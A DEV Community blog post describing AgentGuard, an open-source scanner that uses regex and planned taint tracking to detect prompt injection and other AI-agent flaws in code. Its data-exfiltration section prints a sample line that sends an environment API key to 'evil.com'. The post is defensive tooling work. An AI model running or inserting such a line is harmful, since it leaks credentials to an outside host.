Dockfix Labs

Posted on Jun 28

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities

#ai #security #python #devtools


When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities such as SQL injection or XSS, prompt injection doesn't have a single signature. It's a pattern: untrusted data flowing into an LLM's context. The vulnerability isn't in a single function call; it's in how the prompt is constructed.

The Regex Foundation

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

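import re

# ASI01: Prompt Injection
# Flags an assignment or keyword argument named like prompt/system/message/instruction
# whose value is an f-string containing at least one {...} interpolation.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,  # case-insensitive: also matches Prompt, SYSTEM, and F"..." prefixes
)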

This catches the most common pattern: f-strings that interpolate variables (often user input) directly into LLM prompts. It is blunt, since it cannot tell user input from a trusted constant, but effective. In a scan of 50 open-source agent codebases, this single rule found 127 instances.
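To make the rule concrete, here is a minimal sketch of applying a regex rule like this line by line to a source file. The `scan_source` helper and the `Finding` tuple are hypothetical names for illustration, not AgentGuard's actual API.

```python
import re
from typing import NamedTuple

# Same pattern as the ASI01 rule above.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)


class Finding(NamedTuple):
    """A single rule match (hypothetical structure)."""
    rule_id: str
    line_no: int
    text: str


def scan_source(source: str) -> list[Finding]:
    """Apply the ASI01 regex to each line and collect the matches."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if FSTRING_INJECTION.search(line):
            findings.append(Finding("ASI01", line_no, line.strip()))
    return findings


sample = '''
user_input = input()
prompt = f"You are a helper. {user_input}"
greeting = f"Hello {name}"
'''
for f in scan_source(sample):
    print(f.rule_id, f.line_no, f.text)
```

Because the pattern only looks for a keyword, an assignment, and an f-string with braces, it also fires on harmless interpolations such as `system_message = f"Today is {date}"`; that is the bluntness mentioned above.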

The Problem with Regex

Regex has limits. Consider:

# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"

# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]

Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through dictionaries and list construction.
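A quick way to see the gap is to run the same ASI01 regex against the three patterns above. This sketch simply reuses the pattern; only Pattern A is flagged.

```python
import re

FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)

patterns = {
    "A": 'prompt = f"You are a helper. {user_input}"',
    "B": 'prompt = template.format(input=user_data)',
    "C": 'messages = [{"role": "system", "content": config["system_prompt"] + user_message}]',
}

# Record whether the regex fires on each pattern's key line.
results = {name: bool(FSTRING_INJECTION.search(line)) for name, line in patterns.items()}
for name, flagged in results.items():
    print(name, "flagged" if flagged else "missed")
```

Pattern B slips through because the prompt is built with `.format()` rather than an f-string, and Pattern C because the untrusted value is concatenated inside a dict literal, where no `prompt = f"..."` shape exists.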

This is where AgentGuard is headed next: AST-based semantic analysis.

The AST Layer (Roadmap)

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

Identify sources: function parameters with names like user_input, query, and message, plus request bodies such as request.body
Track propagation: variable assignments, string formatting, list/dict construction
Identify sinks: LLM API calls such as openai.chat.completions.create, and arguments like prompt, messages, and system
Flag paths: any path from a source to a sink that does not pass through sanitization

This is the same source-to-sink taint-tracking approach that Semgrep and CodeQL use for traditional vulnerabilities, specialized for LLM-specific sinks.
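The four steps above can be sketched with Python's standard `ast` module. This is a deliberately simplified, intraprocedural illustration under stated assumptions: sources are only function parameters named `user_input`, `query`, or `message` (no `request.body`), and any call with a `prompt`, `messages`, or `system` keyword argument is treated as a sink rather than matching specific client methods like `openai.chat.completions.create`. It has no sanitizer handling and does not follow calls across functions. `find_taint_paths` is a hypothetical name, not AgentGuard's planned API.

```python
import ast

# Assumed source parameter names and sink keyword names (from the list above).
SOURCE_PARAMS = {"user_input", "query", "message"}
SINK_KWARGS = {"prompt", "messages", "system"}


def names_in(node: ast.AST) -> set[str]:
    """Every variable name that appears anywhere inside a node."""
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}


def find_taint_paths(code: str) -> list[tuple[str, int]]:
    """Return (function name, line) for each sink call that receives tainted data."""
    findings = []
    for func in ast.walk(ast.parse(code)):
        if not isinstance(func, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        # 1. Sources: parameters whose names suggest untrusted input.
        tainted = {a.arg for a in func.args.args if a.arg in SOURCE_PARAMS}
        assigns = [n for n in ast.walk(func) if isinstance(n, ast.Assign)]
        # 2. Propagation (flow-insensitive): an assignment whose right-hand side
        #    reads a tainted name taints its targets. Because names_in() looks
        #    inside the whole expression, f-strings, .format(), concatenation and
        #    list/dict literals all propagate. Repeat until nothing changes.
        changed = True
        while changed:
            changed = False
            for node in assigns:
                if names_in(node.value) & tainted:
                    new = set().union(*(names_in(t) for t in node.targets)) - tainted
                    if new:
                        tainted |= new
                        changed = True
        # 3-4. Sinks: flag any call that passes tainted data through a sink keyword.
        #      This sketch performs no sanitizer check.
        for node in ast.walk(func):
            if isinstance(node, ast.Call):
                for kw in node.keywords:
                    if kw.arg in SINK_KWARGS and names_in(kw.value) & tainted:
                        findings.append((func.name, node.lineno))
    return findings


sample = '''
def answer(user_input, client):
    template = "You are a helper. {input}"
    prompt = template.format(input=user_input)
    messages = [{"role": "system", "content": SYSTEM + prompt}]
    return client.chat.completions.create(model="gpt-4o", messages=messages)

def safe(client):
    return client.chat.completions.create(model="gpt-4o", messages=[])
'''
print(find_taint_paths(sample))  # [('answer', 6)]
```

Unlike the regex, this follows Patterns B and C: the taint moves from `user_input` through `.format()` into `prompt`, then through the list/dict literal into `messages`, and is reported at the `create(...)` call.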

Correlation Detection

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

import os
import requests

api_key = os.environ.get("API_KEY")                                   # line N: secret access
requests.post("https://evil.com/collect", headers={"Auth": api_key})  # line N+1: network call

The rule checks if a secret-access pattern appears on line N and a network-exfiltration pattern appears on line N+1. This catches the most dangerous pattern: an agent that reads credentials and sends them externally.
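A rule of this shape can be sketched as two regexes checked against consecutive lines. The `SECRET_ACCESS` and `NETWORK_CALL` patterns below are simplified stand-ins written for this example, and `correlate` is a hypothetical helper; AgentGuard's actual patterns are not shown in this post.

```python
import re

# Simplified stand-in patterns written for this sketch (not AgentGuard's own rules).
SECRET_ACCESS = re.compile(
    r'os\.(?:environ(?:\.get)?\s*[\[(]|getenv\s*\()\s*["\'][A-Z_]*(?:KEY|TOKEN|SECRET|PASSWORD)',
    re.I,
)
NETWORK_CALL = re.compile(r'\b(?:requests|httpx)\.(?:get|post|put)\s*\(')


def correlate(source: str) -> list[int]:
    """Return 1-based line numbers N where line N reads a secret and line N+1 makes a network call."""
    lines = source.splitlines()
    return [
        i + 1
        for i in range(len(lines) - 1)
        if SECRET_ACCESS.search(lines[i]) and NETWORK_CALL.search(lines[i + 1])
    ]


sample = '''import os
import requests
api_key = os.environ.get("API_KEY")
requests.post("https://evil.com/collect", headers={"Auth": api_key})
'''
print(correlate(sample))  # [3]
```

This only sees adjacent lines: a single statement between the secret read and the network call hides the pattern, which is the gap that function-level taint tracking is meant to close.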

Future versions will extend this to full function-level taint tracking.

The OWASP ASI Top 10 Coverage

AgentGuard currently covers all 10 categories:

ASI ID	Category	Detection Method
ASI01	Prompt Injection	Regex (f-string, concat, format)
ASI02	Tool Abuse	Regex (os.system, subprocess, eval)
ASI03	Data Exfiltration	Regex + cross-line correlation
ASI04	Excessive Agency	Regex (auto-execute, no-confirm)
ASI05	Supply Chain	Regex (untrusted pip install, dynamic import)
ASI06	Insecure Output	Regex (raw HTML, eval output)
ASI07	Credential Exposure	Regex (API keys, private keys, passwords)
ASI08	Context Manipulation	Regex (context stuffing, token bombing)
ASI09	Agent Loop Exploitation	Regex (recursive calls, no depth limit)
ASI10	Trust Boundary	Regex (mixed privilege, cross-agent calls)
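One way to organize rules like these is a registry keyed by ASI ID, where each entry pairs a category name with one or more compiled patterns. The two entries below are illustrative: the ASI02 and ASI07 regexes are simplified guesses at the kinds of calls and secrets the table lists, not AgentGuard's shipped rules, and `Rule`/`scan_line` are hypothetical names.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Rule:
    """One detection rule: an ASI ID, a category name, and the regexes that trigger it."""
    asi_id: str
    category: str
    patterns: list[re.Pattern] = field(default_factory=list)

    def matches(self, line: str) -> bool:
        return any(p.search(line) for p in self.patterns)


RULES = [
    Rule("ASI02", "Tool Abuse", [
        re.compile(r'\bos\.system\s*\('),
        re.compile(r'\bsubprocess\.(?:run|call|Popen|check_output)\s*\('),
        # Lookbehind skips method calls such as model.eval() and ast.literal_eval().
        re.compile(r'(?<![\w.])eval\s*\('),
    ]),
    Rule("ASI07", "Credential Exposure", [
        re.compile(r'-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----'),
        re.compile(r'\bsk-[A-Za-z0-9]{20,}'),
        re.compile(r'password\s*=\s*["\'][^"\']+["\']', re.I),
    ]),
]


def scan_line(line: str) -> list[str]:
    """Return the ASI IDs of every rule that fires on a single line."""
    return [rule.asi_id for rule in RULES if rule.matches(line)]


print(scan_line('subprocess.run(cmd, shell=True)'))  # ['ASI02']
```

Keeping each rule's patterns together makes it straightforward to report findings by category and to add a new pattern to a category without touching the scanning loop.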

Benchmark Results

The benchmark suite has 28 samples, covering five of the ten categories plus two clean files:

ASI01 (6 samples): 100% detection
ASI02 (5 samples): 100% detection
ASI03 (4 samples): 100% detection
ASI07 (6 samples): 100% detection
ASI10 (5 samples): 100% detection
Clean (2 samples): 0% false positives
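Per-category detection rates and the false-positive rate can be computed from labelled samples as in the sketch below. The `results` list is made-up placeholder data to show the arithmetic, not AgentGuard's benchmark output, and `score` is a hypothetical helper.

```python
from collections import defaultdict

# Placeholder data: (expected category, or None for a clean sample; categories the scanner reported).
results = [
    ("ASI01", {"ASI01"}),
    ("ASI01", set()),
    ("ASI07", {"ASI07"}),
    (None, set()),
    (None, {"ASI02"}),
]


def score(results):
    """Return ({category: detection rate}, false-positive rate on clean samples)."""
    hits = defaultdict(int)
    totals = defaultdict(int)
    clean_total = clean_flagged = 0
    for expected, reported in results:
        if expected is None:
            clean_total += 1
            clean_flagged += bool(reported)  # any finding on a clean file is a false positive
        else:
            totals[expected] += 1
            hits[expected] += expected in reported
    detection = {cat: hits[cat] / totals[cat] for cat in totals}
    fp_rate = clean_flagged / clean_total if clean_total else 0.0
    return detection, fp_rate


detection, fp_rate = score(results)
print(detection)  # {'ASI01': 0.5, 'ASI07': 1.0}
print(fp_rate)    # 0.5
```

With only two clean samples, a single spurious match would move the false-positive rate from 0% to 50%, so that figure is best read alongside the sample counts.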

What's Next

AST-based taint tracking for Python and JavaScript
Language support: Rust, Go, Java
GitHub Code Scanning integration via SARIF
MCP server mode for real-time scanning in AI coding assistants
Semantic injection detection: understanding prompt structure, not just string patterns
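For the planned GitHub Code Scanning integration, findings would need to be serialized as SARIF 2.1.0. A minimal sketch of that conversion follows; the `(rule_id, path, line, message)` finding shape, the `to_sarif` name, and the tool name string are assumptions for illustration.

```python
import json


def to_sarif(findings, tool_name="AgentGuard"):
    """Convert (rule_id, path, line, message) tuples into a minimal SARIF 2.1.0 log."""
    rule_ids = sorted({f[0] for f in findings})
    return {
        "version": "2.1.0",
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "runs": [{
            "tool": {"driver": {
                "name": tool_name,
                "rules": [{"id": rid} for rid in rule_ids],
            }},
            "results": [
                {
                    "ruleId": rule_id,
                    "level": "warning",
                    "message": {"text": message},
                    "locations": [{
                        "physicalLocation": {
                            "artifactLocation": {"uri": path},
                            "region": {"startLine": line},
                        }
                    }],
                }
                for rule_id, path, line, message in findings
            ],
        }],
    }


findings = [("ASI01", "agent/app.py", 3, "User input interpolated into prompt")]
print(json.dumps(to_sarif(findings), indent=2))
```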

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.

AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.

DEV Community
